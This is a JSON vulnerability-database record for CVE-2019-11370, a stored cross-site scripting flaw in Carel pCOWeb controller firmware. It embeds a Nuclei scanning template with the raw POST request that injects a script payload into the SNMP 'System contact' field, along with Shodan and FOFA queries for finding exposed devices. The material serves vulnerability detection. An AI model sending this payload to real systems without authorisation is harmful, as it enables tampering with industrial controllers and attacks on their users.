{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-11370/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-11370/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-11370/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-11370/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-11370/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-11370"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-11370"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.05026,
      "kev": false,
      "percentile": 0.91886
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-11370.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2019-11370\n\ninfo:\n  name: Carel pCOWeb <B1.2.4 - Cross-Site Scripting\n  author: arafatansari\n  severity: medium\n  description: |\n    Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n  impact: |\n    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n  remediation: |\n    Apply the latest patch or upgrade to a version that addresses the vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/46897\n    - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-11370\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 5.4\n    cve-id: CVE-2019-11370\n    cwe-id: CWE-79\n    epss-score: 0.05026\n    epss-percentile: 0.91886\n    cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: carel\n    product: pcoweb_card_firmware\n    shodan-query:\n      - http.html:\"pCOWeb\"\n      - http.html:\"pcoweb\"\n    fofa-query: body=\"pcoweb\"\n  tags: cve,cve2019,pcoweb,xss,carel,edb,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /config/pw_snmp_done.html HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n      - |\n        GET /config/pw_snmp.html HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_2, \"text/html\")'\n          - status_code_2 == 200\n          - contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')\n        condition: and\n# digest: 4b0a00483046022100c298d3b9ccdd982804570da7accb55bb8493f99dbe45d4fea31b81ba0042475b022100962e7ae2c4b4a7bc0227b5ec5fa23edcc2ac6146d1cf4439eda05e48c97e5bf5:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-11370"
}